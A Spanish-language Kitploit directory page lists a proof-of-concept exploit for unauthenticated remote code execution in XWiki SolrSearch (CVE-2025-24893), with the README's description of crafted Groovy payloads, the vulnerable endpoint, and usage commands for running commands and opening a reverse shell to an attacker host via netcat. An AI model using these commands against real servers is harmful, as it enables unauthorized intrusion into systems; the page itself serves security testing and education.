Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
xwiki_solrsearch-rce-exploit — PoC de RCE no autenticada para XWiki SolrSearch (CVE-2025-24893). Ejecución de comandos + shell inversa. | Kitploit
Herramientas/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlAprendizaje y EducaciónDesarrollo de Payloads
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

PoC de RCE no autenticada para XWiki SolrSearch (CVE-2025-24893). Ejecución de comandos + shell inversa.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 8 mesesAún no revisado

solrsearch-rce-exploit

PoC de RCE no autenticada para XWiki SolrSearch (CVE-2025-24893). Ejecución de comandos + shell inversa.

CVE-2025-24893 – XWiki SolrSearch RCE PoC

Prueba de concepto para la inyección de plantillas SolrSearch de XWiki que permite la ejecución remota de código sin autenticación.

Probado contra XWiki Debian 15.10.8 (parcheado en 15.10.11 / 16.4.1 / 16.5.0RC1).

⚠️ Solo para uso educativo. No lo ejecutes contra sistemas que no sean tuyos o para los que no tengas permiso explícito.

Qué hace

  • Envía payloads de Groovy manipulados a través de /xwiki/bin/get/Main/SolrSearch.
  • Ejecuta comandos arbitrarios y envuelve la salida en marcadores Base64 para una decodificación limpia.
  • Soporta el lanzamiento de una shell inversa mediante sockets de Java.

Requisitos

  • Python 3.x
  • Instala las dependencias con:
root@kitploit:~
pip install requests

Uso

Especifica el host objetivo (y la ruta opcional) al ejecutar el script.

Ejecuta comandos básicos:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

Inicia una shell inversa:

root@kitploit:~
# On attacker box
nc -lvnp 4444

# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444

Notas

  • Endpoint: /xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • La salida Base64 limpia garantiza un análisis fiable.
  • Demostrado originalmente durante HTB Editor, pero aplicable a otras instancias vulnerables.
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
Descargar herramienta